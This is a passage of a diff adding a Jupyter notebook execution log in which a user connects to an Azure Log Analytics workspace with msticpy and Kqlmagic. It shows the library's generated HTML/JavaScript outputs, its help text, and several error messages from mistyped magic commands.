TODO: save selected cell index, so that the clear will be done on the lince cell\n                    }\n                    </script>\n\n                    </body></html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<!DOCTYPE html>\n                    <html><body><script>\n\n                        // close authentication window\n                        if (kql_MagicUserCodeAuthWindow && kql_MagicUserCodeAuthWindow.opener != null && !kql_MagicUserCodeAuthWindow.closed) {\n                            kql_MagicUserCodeAuthWindow.close()\n                        }\n                        // TODO: make sure, you clear the right cell. BTW, not sure it is a must to do any clearing\n\n                        // clear output cell\n                        Jupyter.notebook.clear_output(Jupyter.notebook.get_selected_index())\n\n                        // TODO: if in run all mode, move to last cell, otherwise move to next cell\n                        // move to next cell\n\n                    </script></body></html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<!DOCTYPE html>\n            <html><body>\n\n            <button onclick=\"this.style.visibility='visible';kql_MagicLaunchWindowFunction('Kqlmagic_temp_files/_a927809c-8142-43e1-96b3-4ad87cfe95a3_at_loganalytics_schema.html','fullscreen=no,directories=no,location=no,menubar=no,resizable=yes,scrollbars=yes,status=no,titlebar=no,toolbar=no,','_a927809c_8142_43e1_96b3_4ad87cfe95a3_at_loganalytics_schema','')\">popup schema a927809c-8142-43e1-96b3-4ad87cfe95a3@loganalytics</button>\n\n            <script>\n\n            function kql_MagicLaunchWindowFunction(file_path, window_params, window_name, notebooks_host) {\n                var url;\n                if (file_path.startsWith('http')) {\n                    url = file_path;\n                } else {\n                    var base_url = '';\n\n                    // check if azure notebook\n                    var azure_host = (notebooks_host == null || notebooks_host.length == 0) ? 'https://notebooks.azure.com' : notebooks_host;\n                    var start = azure_host.search('//');\n                    var azure_host_suffix = '.' + azure_host.substring(start+2);\n\n                    var loc = String(window.location);\n                    var end = loc.search(azure_host_suffix);\n                    start = loc.search('//');\n                    if (start > 0 && end > 0) {\n                        var parts = loc.substring(start+2, end).split('-');\n                        if (parts.length == 2) {\n                            var library = parts[0];\n                            var user = parts[1];\n                            base_url = azure_host + '/api/user/' +user+ '/library/' +library+ '/html/';\n                        }\n                    }\n\n                    // check if local jupyter lab\n                    if (base_url.length == 0) {\n                        var configDataScipt  = document.getElementById('jupyter-config-data');\n                        if (configDataScipt != null) {\n                            var jupyterConfigData = JSON.parse(configDataScipt.textContent);\n                            if (jupyterConfigData['appName'] == 'JupyterLab' && jupyterConfigData['serverRoot'] != null &&  jupyterConfigData['treeUrl'] != null) {\n                                var basePath = 'E:/src/notebooks/tests' + '/';\n                                if (basePath.startsWith(jupyterConfigData['serverRoot'])) {\n                                    base_url = '/files/' + basePath.substring(jupyterConfigData['serverRoot'].length+1);\n                                }\n                            } \n                        }\n                    }\n\n                    // assume local jupyter notebook\n                    if (base_url.length == 0) {\n\n                        var parts = loc.split('/');\n                        parts.pop();\n                        base_url = parts.join('/') + '/';\n                    }\n                    url = base_url + file_path;\n                }\n\n                window.focus();\n                var w = screen.width / 2;\n                var h = screen.height / 2;\n                params = 'width='+w+',height='+h;\n                kql_Magic__a927809c_8142_43e1_96b3_4ad87cfe95a3_at_loganalytics_schema = window.open(url, window_name, window_params + params);\n            }\n            </script>\n\n            </body></html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "9026887c-7e4b-4bea-9dbb-28b7445cdd2e",
+     "text": "# Authentication\nfrom msticpy.common.wsconfig import WorkspaceConfig\nws_config = WorkspaceConfig('config.json')\nWORKSPACE_ID = \"a927809c-8142-43e1-96b3-4ad87cfe95a3\"\nTENANT_ID = \"69d28fd7-42a5-48bc-a619-af56397b9f28\"\n\nqry_prov = QueryProvider(data_environment='LogAnalytics')\nla_connection_string = f'loganalytics://code().tenant(\"{TENANT_ID}\").workspace(\"{WORKSPACE_ID}\")'\nqry_prov.connect(connection_str=la_connection_string)"
+    },
+    "executionTime": "2019-08-15T21:14:25.224Z"
+   },
+   {
+    "cell": {
+     "executionCount": 3,
+     "executionEventId": "6b8bfbf2-667c-4d24-829f-69d5319c79c2",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "application/javascript": "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}",
+        "text/plain": "<IPython.core.display.Javascript object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql"
+    },
+    "executionTime": "2019-08-15T21:14:37.174Z"
+   },
+   {
+    "cell": {
+     "executionCount": 4,
+     "executionEventId": "964b3603-7862-4a5a-9c4a-a1d4e0d24481",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "application/javascript": "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}",
+        "text/plain": "<IPython.core.display.Javascript object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<html>\n        <head>\n        \n        </head>\n        <body>\n        <div><p style='padding: 10px; color: #3a87ad; background-color: #d9edf7; border-color: #bce9f1'>&nbsp;*&nbsp;a927809c-8142-43e1-96b3-4ad87cfe95a3@loganalytics</p></div>\n        </body>\n        </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<html>\n        <head>\n        \n        </head>\n        <body>\n        <div><p style='padding: 10px; color: #b94a48; background-color: #f2dede; border-color: #eed3d7'>[&apos;{&quot;error&quot;:{&quot;message&quot;:&quot;The&nbsp;request&nbsp;had&nbsp;some&nbsp;invalid&nbsp;properties&quot;,&quot;code&quot;:&quot;BadArgumentError&quot;,&quot;innererror&quot;:{&quot;code&quot;:&quot;SemanticError&quot;,&quot;message&quot;:&quot;A&nbsp;semantic&nbsp;error&nbsp;occurred.&quot;,&quot;innererror&quot;:{&quot;code&quot;:&quot;SEM0100&quot;,&quot;message&quot;:&quot;\\&apos;\\&apos;&nbsp;operator:&nbsp;Failed&nbsp;to&nbsp;resolve&nbsp;table&nbsp;or&nbsp;column&nbsp;or&nbsp;scalar&nbsp;expression&nbsp;named&nbsp;\\&apos;connection\\&apos;&quot;}}}}&apos;]</p></div>\n        </body>\n        </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql connection"
+    },
+    "executionTime": "2019-08-15T21:14:53.582Z"
+   },
+   {
+    "cell": {
+     "executionCount": 5,
+     "executionEventId": "f857cb88-b1bc-4d2c-a4c6-55ddb40983c4",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<h2>Overview</h2>\n<p>Help command is a tool to get more information on a topics that are relevant to Kqlmagic.\nt\nusage: <code>%kql --help \"topic\"</code><br></p>\n<h2>Topics</h2>\n<ul>\n<li>\n<p><strong>usage</strong> - How to use the Kqlmagic.<br>\n<br></p>\n</li>\n<li>\n<p><strong>conn</strong> - Lists the available connection string variation, and how their are used to authenticatie to data sources.<br>\n<br></p>\n</li>\n<li>\n<p><strong>query</strong> / <strong>kql</strong> - <a href=\"http://aka.ms/kdocs\">Reference to resources Kusto Queru language, aka kql, documentation</a><br>\n<br></p>\n</li>\n<li>\n<p><strong>options</strong> - Lists the available options, and their behavior impact on the submit query command.<br>\n<br></p>\n</li>\n<li>\n<p><strong>commands</strong> - Lists the available commands, and what they do.<br>\n<br></p>\n</li>\n<li>\n<p><strong>faq</strong> - Lists frequently asked quetions and answers.<br>\n<br></p>\n</li>\n<li>\n<p><strong>help</strong> - This help.<br>\n<br></p>\n</li>\n<li>\n<p><strong>AzureMonitor</strong>- <a href=\"https://docs.microsoft.com/azure/azure-monitor/\">Reference to resources Azure Monitor tools</a><br>\nAzure Monitor, which now includes Log Analytics and Application Insights, provides sophisticated tools for collecting and analyzing telemetry that allow you to maximize the performance and availability of your cloud and on-premises resources and applications. It helps you understand how your applications are performing and proactively identifies issues affecting them and the resources they depend on.\n<br></p>\n</li>\n<li>\n<p><strong>AzureDataExplorer</strong> / <strong>kusto</strong>- <a href=\"https://docs.microsoft.com/azure/data-explorer/\">Reference to resources Azure Data Explorer (kusto) service</a><br>\nAzure Data Explorer is a fast and highly scalable data exploration service for log and telemetry data. It helps you handle the many data streams emitted by modern software, so you can collect, store, and analyze data. Azure Data Explorer is ideal for analyzing large volumes of diverse data from any data source, such as websites, applications, IoT devices, and more.\n<br></p>\n</li>\n<li>\n<p><strong>LogAnalytics</strong>- <a href=\"https://docs.microsoft.com/azure/log-analytics/log-analytics-queries?toc=/azure/azure-monitor/toc.json\">Reference to resources Log Analytics service</a><br>\nLog data collected by Azure Monitor is stored in Log Analytics which collects telemetry and other data from a variety of sources and provides a query language for advanced analytics.\n<br></p>\n</li>\n<li>\n<p><strong>ApplicationInsights</strong> / <strong>AppInsights</strong>- <a href=\"https://docs.microsoft.com/azure/application-insights/app-insights-overview?toc=/azure/azure-monitor/toc.json\">Reference to resources Application Insights service</a><br>\nApplication Insights is an extensible Application Performance Management (APM) service for web developers on multiple platforms. Use it to monitor your live web application. It will automatically detect performance anomalies. It includes powerful analytics tools to help you diagnose issues and to understand what users actually do with your app. It's designed to help you continuously improve performance and usability. It works for apps on a wide variety of platforms including .NET, Node.js and J2EE, hosted on-premises or in the cloud. It integrates with your DevOps process, and has connection points to a variety of development tools. It can monitor and analyze telemetry from mobile apps by integrating with Visual Studio App Center.\n<br></p>\n</li>\n</ul>\n<h2>Need Support?</h2>\n<ul>\n<li><strong>Have a feature request for Kqlmagic?</strong> Please post it on <a href=\"https://feedback.azure.com/forums/913690-azure-monitor\">User Voice</a> to help us prioritize</li>\n<li><strong>Have a technical question?</strong> Ask on <a href=\"https://stackoverflow.com/questions/tagged/Kqlmagic\">Stack Overflow with tag \"Kqlmagic\"</a></li>\n<li><strong>Need Support?</strong> Every customer with an active Azure subscription has access to <a href=\"https://docs.microsoft.com/azure/azure-supportability/how-to-create-azure-support-request\">support</a> with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team</li>\n<li><strong>Found a bug?</strong> Please help us fix it by thoroughly documenting it and <a href=\"https://github.com/Microsoft/jupyter-Kqlmagic/issues/new\">filing an issue</a>.</li>\n</ul>",
+        "text/markdown": "## Overview\nHelp command is a tool to get more information on a topics that are relevant to Kqlmagic.\nt\nusage: ```%kql --help \"topic\"```<br>\n\n## Topics\n- **usage** - How to use the Kqlmagic.<br>\n<br>\n\n- **conn** - Lists the available connection string variation, and how their are used to authenticatie to data sources.<br>\n<br>\n\n- **query** / **kql** - [Reference to resources Kusto Queru language, aka kql, documentation](http://aka.ms/kdocs)<br>\n<br>\n\n- **options** - Lists the available options, and their behavior impact on the submit query command.<br>\n<br>\n\n- **commands** - Lists the available commands, and what they do.<br>\n<br>\n\n- **faq** - Lists frequently asked quetions and answers.<br>\n<br>\n\n- **help** - This help.<br>\n<br>\n\n- **AzureMonitor**- [Reference to resources Azure Monitor tools](https://docs.microsoft.com/azure/azure-monitor/)<br>\nAzure Monitor, which now includes Log Analytics and Application Insights, provides sophisticated tools for collecting and analyzing telemetry that allow you to maximize the performance and availability of your cloud and on-premises resources and applications. It helps you understand how your applications are performing and proactively identifies issues affecting them and the resources they depend on.\n<br>\n\n- **AzureDataExplorer** / **kusto**- [Reference to resources Azure Data Explorer (kusto) service](https://docs.microsoft.com/azure/data-explorer/)<br>\nAzure Data Explorer is a fast and highly scalable data exploration service for log and telemetry data. It helps you handle the many data streams emitted by modern software, so you can collect, store, and analyze data. Azure Data Explorer is ideal for analyzing large volumes of diverse data from any data source, such as websites, applications, IoT devices, and more.\n<br>\n\n- **LogAnalytics**- [Reference to resources Log Analytics service](https://docs.microsoft.com/azure/log-analytics/log-analytics-queries?toc=/azure/azure-monitor/toc.json)<br>\nLog data collected by Azure Monitor is stored in Log Analytics which collects telemetry and other data from a variety of sources and provides a query language for advanced analytics.\n<br>\n\n- **ApplicationInsights** / **AppInsights**- [Reference to resources Application Insights service](https://docs.microsoft.com/azure/application-insights/app-insights-overview?toc=/azure/azure-monitor/toc.json)<br>\nApplication Insights is an extensible Application Performance Management (APM) service for web developers on multiple platforms. Use it to monitor your live web application. It will automatically detect performance anomalies. It includes powerful analytics tools to help you diagnose issues and to understand what users actually do with your app. It's designed to help you continuously improve performance and usability. It works for apps on a wide variety of platforms including .NET, Node.js and J2EE, hosted on-premises or in the cloud. It integrates with your DevOps process, and has connection points to a variety of development tools. It can monitor and analyze telemetry from mobile apps by integrating with Visual Studio App Center.\n<br>\n\n\n## Need Support?\n- **Have a feature request for Kqlmagic?** Please post it on [User Voice](https://feedback.azure.com/forums/913690-azure-monitor) to help us prioritize\n- **Have a technical question?** Ask on [Stack Overflow with tag \"Kqlmagic\"](https://stackoverflow.com/questions/tagged/Kqlmagic)\n- **Need Support?** Every customer with an active Azure subscription has access to [support](https://docs.microsoft.com/azure/azure-supportability/how-to-create-azure-support-request) with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team\n- **Found a bug?** Please help us fix it by thoroughly documenting it and [filing an issue](https://github.com/Microsoft/jupyter-Kqlmagic/issues/new).\n",
+        "text/plain": "Overview\nHelp command is a tool to get more information on a topics that are relevant to Kqlmagic.\nt\nusage: %kql --help \"topic\"\nTopics\n\n\nusage - How to use the Kqlmagic.\n\n\n\nconn - Lists the available connection string variation, and how their are used to authenticatie to data sources.\n\n\n\nquery / kql - Reference to resources Kusto Queru language, aka kql, documentation\n\n\n\noptions - Lists the available options, and their behavior impact on the submit query command.\n\n\n\ncommands - Lists the available commands, and what they do.\n\n\n\nfaq - Lists frequently asked quetions and answers.\n\n\n\nhelp - This help.\n\n\n\nAzureMonitor- Reference to resources Azure Monitor tools\nAzure Monitor, which now includes Log Analytics and Application Insights, provides sophisticated tools for collecting and analyzing telemetry that allow you to maximize the performance and availability of your cloud and on-premises resources and applications. It helps you understand how your applications are performing and proactively identifies issues affecting them and the resources they depend on.\n\n\n\nAzureDataExplorer / kusto- Reference to resources Azure Data Explorer (kusto) service\nAzure Data Explorer is a fast and highly scalable data exploration service for log and telemetry data. It helps you handle the many data streams emitted by modern software, so you can collect, store, and analyze data. Azure Data Explorer is ideal for analyzing large volumes of diverse data from any data source, such as websites, applications, IoT devices, and more.\n\n\n\nLogAnalytics- Reference to resources Log Analytics service\nLog data collected by Azure Monitor is stored in Log Analytics which collects telemetry and other data from a variety of sources and provides a query language for advanced analytics.\n\n\n\nApplicationInsights / AppInsights- Reference to resources Application Insights service\nApplication Insights is an extensible Application Performance Management (APM) service for web developers on multiple platforms. Use it to monitor your live web application. It will automatically detect performance anomalies. It includes powerful analytics tools to help you diagnose issues and to understand what users actually do with your app. It's designed to help you continuously improve performance and usability. It works for apps on a wide variety of platforms including .NET, Node.js and J2EE, hosted on-premises or in the cloud. It integrates with your DevOps process, and has connection points to a variety of development tools. It can monitor and analyze telemetry from mobile apps by integrating with Visual Studio App Center.\n\n\n\nNeed Support?\n\nHave a feature request for Kqlmagic? Please post it on User Voice to help us prioritize\nHave a technical question? Ask on Stack Overflow with tag \"Kqlmagic\"\nNeed Support? Every customer with an active Azure subscription has access to support with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team\nFound a bug? Please help us fix it by thoroughly documenting it and filing an issue."
+       },
+       "execution_count": 5,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql --help"
+    },
+    "executionTime": "2019-08-15T21:15:04.512Z"
+   },
+   {
+    "cell": {
+     "executionCount": 6,
+     "executionEventId": "0cc68306-40c8-4bd7-8b5a-b394a80025b6",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "application/javascript": "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}",
+        "text/plain": "<IPython.core.display.Javascript object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<html>\n        <head>\n        \n        </head>\n        <body>\n        <div><p style='padding: 10px; color: #3a87ad; background-color: #d9edf7; border-color: #bce9f1'>&nbsp;*&nbsp;a927809c-8142-43e1-96b3-4ad87cfe95a3@loganalytics</p></div>\n        </body>\n        </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      },
+      {
+       "data": {
+        "text/html": "<html>\n        <head>\n        \n        </head>\n        <body>\n        <div><p style='padding: 10px; color: #b94a48; background-color: #f2dede; border-color: #eed3d7'>[&apos;{&quot;error&quot;:{&quot;message&quot;:&quot;The&nbsp;request&nbsp;had&nbsp;some&nbsp;invalid&nbsp;properties&quot;,&quot;code&quot;:&quot;BadArgumentError&quot;,&quot;innererror&quot;:{&quot;code&quot;:&quot;SemanticError&quot;,&quot;message&quot;:&quot;A&nbsp;semantic&nbsp;error&nbsp;occurred.&quot;,&quot;innererror&quot;:{&quot;code&quot;:&quot;SEM0100&quot;,&quot;message&quot;:&quot;\\&apos;\\&apos;&nbsp;operator:&nbsp;Failed&nbsp;to&nbsp;resolve&nbsp;table&nbsp;or&nbsp;column&nbsp;or&nbsp;scalar&nbsp;expression&nbsp;named&nbsp;\\&apos;conn\\&apos;&quot;}}}}&apos;]</p></div>\n        </body>\n        </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql conn"
+    },
+    "executionTime": "2019-08-15T21:15:14.239Z"
+   },
+   {
+    "cell": {
+     "executionCount": 7,
+     "executionEventId": "ab95c6dc-b626-428c-a242-16e39b600bb4",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<html>\n        <head>\n        \n        </head>\n        <body>\n        <div><p style='padding: 10px; color: #b94a48; background-color: #f2dede; border-color: #eed3d7'>unknown&nbsp;command&nbsp;--conn</p></div>\n        </body>\n        </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql --conn"
+    },
+    "executionTime": "2019-08-15T21:15:19.309Z"
+   },
+   {
+    "cell": {
+     "executionCount": 8,
+     "executionEventId": "1cde5d5f-c7b3-4f1b-ad3f-03b2b024d021",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<h2>Overview</h2>\n<p>Help command is a tool to get more information on a topics that are relevant to Kqlmagic.\nt\nusage: <code>%kql --help \"topic\"</code><br></p>\n<h2>Topics</h2>\n<ul>\n<li>\n<p><strong>usage</strong> - How to use the Kqlmagic.<br>\n<br></p>\n</li>\n<li>\n<p><strong>conn</strong> - Lists the available connection string variation, and how their are used to authenticatie to data sources.<br>\n<br></p>\n</li>\n<li>\n<p><strong>query</strong> / <strong>kql</strong> - <a href=\"http://aka.ms/kdocs\">Reference to resources Kusto Queru language, aka kql, documentation</a><br>\n<br></p>\n</li>\n<li>\n<p><strong>options</strong> - Lists the available options, and their behavior impact on the submit query command.<br>\n<br></p>\n</li>\n<li>\n<p><strong>commands</strong> - Lists the available commands, and what they do.<br>\n<br></p>\n</li>\n<li>\n<p><strong>faq</strong> - Lists frequently asked quetions and answers.<br>\n<br></p>\n</li>\n<li>\n<p><strong>help</strong> - This help.<br>\n<br></p>\n</li>\n<li>\n<p><strong>AzureMonitor</strong>- <a href=\"https://docs.microsoft.com/azure/azure-monitor/\">Reference to resources Azure Monitor tools</a><br>\nAzure Monitor, which now includes Log Analytics and Application Insights, provides sophisticated tools for collecting and analyzing telemetry that allow you to maximize the performance and availability of your cloud and on-premises resources and applications. It helps you understand how your applications are performing and proactively identifies issues affecting them and the resources they depend on.\n<br></p>\n</li>\n<li>\n<p><strong>AzureDataExplorer</strong> / <strong>kusto</strong>- <a href=\"https://docs.microsoft.com/azure/data-explorer/\">Reference to resources Azure Data Explorer (kusto) service</a><br>\nAzure Data Explorer is a fast and highly scalable data exploration service for log and telemetry data. It helps you handle the many data streams emitted by modern software, so you can collect, store, and analyze data. Azure Data Explorer is ideal for analyzing large volumes of diverse data from any data source, such as websites, applications, IoT devices, and more.\n<br></p>\n</li>\n<li>\n<p><strong>LogAnalytics</strong>- <a href=\"https://docs.microsoft.com/azure/log-analytics/log-analytics-queries?toc=/azure/azure-monitor/toc.json\">Reference to resources Log Analytics service</a><br>\nLog data collected by Azure Monitor is stored in Log Analytics which collects telemetry and other data from a variety of sources and provides a query language for advanced analytics.\n<br></p>\n</li>\n<li>\n<p><strong>ApplicationInsights</strong> / <strong>AppInsights</strong>- <a href=\"https://docs.microsoft.com/azure/application-insights/app-insights-overview?toc=/azure/azure-monitor/toc.json\">Reference to resources Application Insights service</a><br>\nApplication Insights is an extensible Application Performance Management (APM) service for web developers on multiple platforms. Use it to monitor your live web application. It will automatically detect performance anomalies. It includes powerful analytics tools to help you diagnose issues and to understand what users actually do with your app. It's designed to help you continuously improve performance and usability. It works for apps on a wide variety of platforms including .NET, Node.js and J2EE, hosted on-premises or in the cloud. It integrates with your DevOps process, and has connection points to a variety of development tools. It can monitor and analyze telemetry from mobile apps by integrating with Visual Studio App Center.\n<br></p>\n</li>\n</ul>\n<h2>Need Support?</h2>\n<ul>\n<li><strong>Have a feature request for Kqlmagic?</strong> Please post it on <a href=\"https://feedback.azure.com/forums/913690-azure-monitor\">User Voice</a> to help us prioritize</li>\n<li><strong>Have a technical question?</strong> Ask on <a href=\"https://stackoverflow.com/questions/tagged/Kqlmagic\">Stack Overflow with tag \"Kqlmagic\"</a></li>\n<li><strong>Need Support?</strong> Every customer with an active Azure subscription has access to <a href=\"https://docs.microsoft.com/azure/azure-supportability/how-to-create-azure-support-request\">support</a> with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team</li>\n<li><strong>Found a bug?</strong> Please help us fix it by thoroughly documenting it and <a href=\"https://github.com/Microsoft/jupyter-Kqlmagic/issues/new\">filing an issue</a>.</li>\n</ul>",
+        "text/markdown": "## Overview\nHelp command is a tool to get more information on a topics that are relevant to Kqlmagic.\nt\nusage: ```%kql --help \"topic\"```<br>\n\n## Topics\n- **usage** - How to use the Kqlmagic.<br>\n<br>\n\n- **conn** - Lists the available connection string variation, and how their are used to authenticatie to data sources.<br>\n<br>\n\n- **query** / **kql** - [Reference to resources Kusto Queru language, aka kql, documentation](http://aka.ms/kdocs)<br>\n<br>\n\n- **options** - Lists the available options, and their behavior impact on the submit query command.<br>\n<br>\n\n- **commands** - Lists the available commands, and what they do.<br>\n<br>\n\n- **faq** - Lists frequently asked quetions and answers.<br>\n<br>\n\n- **help** - This help.<br>\n<br>\n\n- **AzureMonitor**- [Reference to resources Azure Monitor tools](https://docs.microsoft.com/azure/azure-monitor/)<br>\nAzure Monitor, which now includes Log Analytics and Application Insights, provides sophisticated tools for collecting and analyzing telemetry that allow you to maximize the performance and availability of your cloud and on-premises resources and applications. It helps you understand how your applications are performing and proactively identifies issues affecting them and the resources they depend on.\n<br>\n\n- **AzureDataExplorer** / **kusto**- [Reference to resources Azure Data Explorer (kusto) service](https://docs.microsoft.com/azure/data-explorer/)<br>\nAzure Data Explorer is a fast and highly scalable data exploration service for log and telemetry data. It helps you handle the many data streams emitted by modern software, so you can collect, store, and analyze data. Azure Data Explorer is ideal for analyzing large volumes of diverse data from any data source, such as websites, applications, IoT devices, and more.\n<br>\n\n- **LogAnalytics**- [Reference to resources Log Analytics service](https://docs.microsoft.com/azure/log-analytics/log-analytics-queries?toc=/azure/azure-monitor/toc.json)<br>\nLog data collected by Azure Monitor is stored in Log Analytics which collects telemetry and other data from a variety of sources and provides a query language for advanced analytics.\n<br>\n\n- **ApplicationInsights** / **AppInsights**- [Reference to resources Application Insights service](https://docs.microsoft.com/azure/application-insights/app-insights-overview?toc=/azure/azure-monitor/toc.json)<br>\nApplication Insights is an extensible Application Performance Management (APM) service for web developers on multiple platforms. Use it to monitor your live web application. It will automatically detect performance anomalies. It includes powerful analytics tools to help you diagnose issues and to understand what users actually do with your app. It's designed to help you continuously improve performance and usability. It works for apps on a wide variety of platforms including .NET, Node.js and J2EE, hosted on-premises or in the cloud. It integrates with your DevOps process, and has connection points to a variety of development tools. It can monitor and analyze telemetry from mobile apps by integrating with Visual Studio App Center.\n<br>\n\n\n## Need Support?\n- **Have a feature request for Kqlmagic?** Please post it on [User Voice](https://feedback.azure.com/forums/913690-azure-monitor) to help us prioritize\n- **Have a technical question?** Ask on [Stack Overflow with tag \"Kqlmagic\"](https://stackoverflow.com/questions/tagged/Kqlmagic)\n- **Need Support?** Every customer with an active Azure subscription has access to [support](https://docs.microsoft.com/azure/azure-supportability/how-to-create-azure-support-request) with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team\n- **Found a bug?** Please help us fix it by thoroughly documenting it and [filing an issue](https://github.com/Microsoft/jupyter-Kqlmagic/issues/new).\n",
+        "text/plain": "Overview\nHelp command is a tool to get more information on a topics that are relevant to Kqlmagic.\nt\nusage: %kql --help \"topic\"\nTopics\n\n\nusage - How to use the Kqlmagic.\n\n\n\nconn - Lists the available connection string variation, and how their are used to authenticatie to data sources.\n\n\n\nquery / kql - Reference to resources Kusto Queru language, aka kql, documentation\n\n\n\noptions - Lists the available options, and their behavior impact on the submit query command.\n\n\n\ncommands - Lists the available commands, and what they do.\n\n\n\nfaq - Lists frequently asked quetions and answers.\n\n\n\nhelp - This help.\n\n\n\nAzureMonitor- Reference to resources Azure Monitor tools\nAzure Monitor, which now includes Log Analytics and Application Insights, provides sophisticated tools for collecting and analyzing telemetry that allow you to maximize the performance and availability of your cloud and on-premises resources and applications. It helps you understand how your applications are performing and proactively identifies issues affecting them and the resources they depend on.\n\n\n\nAzureDataExplorer / kusto- Reference to resources Azure Data Explorer (kusto) service\nAzure Data Explorer is a fast and highly scalable data exploration service for log and telemetry data. It helps you handle the many data streams emitted by modern software, so you can collect, store, and analyze data. Azure Data Explorer is ideal for analyzing large volumes of diverse data from any data source, such as websites, applications, IoT devices, and more.\n\n\n\nLogAnalytics- Reference to resources Log Analytics service\nLog data collected by Azure Monitor is stored in Log Analytics which collects telemetry and other data from a variety of sources and provides a query language for advanced analytics.\n\n\n\nApplicationInsights / AppInsights- Reference to resources Application Insights service\nApplication Insights is an extensible Application Performance Management (APM) service for web developers on multiple platforms. Use it to monitor your live web application. It will automatically detect performance anomalies. It includes powerful analytics tools to help you diagnose issues and to understand what users actually do with your app. It's designed to help you continuously improve performance and usability. It works for apps on a wide variety of platforms including .NET, Node.js and J2EE, hosted on-premises or in the cloud. It integrates with your DevOps process, and has connection points to a variety of development tools. It can monitor and analyze telemetry from mobile apps by integrating with Visual Studio App Center.\n\n\n\nNeed Support?\n\nHave a feature request for Kqlmagic? Please post it on User Voice to help us prioritize\nHave a technical question? Ask on Stack Overflow with tag \"Kqlmagic\"\nNeed Support? Every customer with an active Azure subscription has access to support with guaranteed response time.  Consider submitting a ticket and get assistance from Microsoft support team\nFound a bug? Please help us fix it by thoroughly documenting it and filing an issue."
+       },
+       "execution_count": 8,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql --help"
+    },
+    "executionTime": "2019-08-15T21:15:27.059Z"
+   },
+   {
+    "cell": {
+     "executionCount": 9,
+     "executionEventId": "fd04bf25-85eb-4bb6-812d-d6fb720ceafb",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<html>\n        <head>\n        \n        </head>\n        <body>\n        <div><p style='padding: 10px; color: #b94a48; background-color: #f2dede; border-color: #eed3d7'>failed&nbsp;to&nbsp;set&nbsp;--help,&nbsp;due&nbsp;to&nbsp;invalid&nbsp;str&nbsp;value&nbsp;commands.</p></div>\n        </body>\n        </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql --help commands"
+    },
+    "executionTime": "2019-08-15T21:15:41.968Z"
+   },
+   {
+    "cell": {
+     "executionCount": 10,
+     "executionEventId": "ba02115b-9fdb-4944-b471-d4df1c9bf669",
+     "hasError": false,
+     "id": "c591dfa1-6746-4363-ad43-da0e669ecb0b",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<html>\n        <head>\n        \n        </head>\n        <body>\n        <div><p style='padding: 10px; color: #b94a48; background-color: #f2dede; border-color: #eed3d7'>unknown&nbsp;command&nbsp;--commands</p></div>\n        </body>\n        </html>",
+        "text/plain": "<IPython.core.display.HTML object>"
+       },
+       "metadata": {},
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "53af05b4-61af-4e19-9720-f03ca043969e",
+     "text": "%kql --commands"
+    },
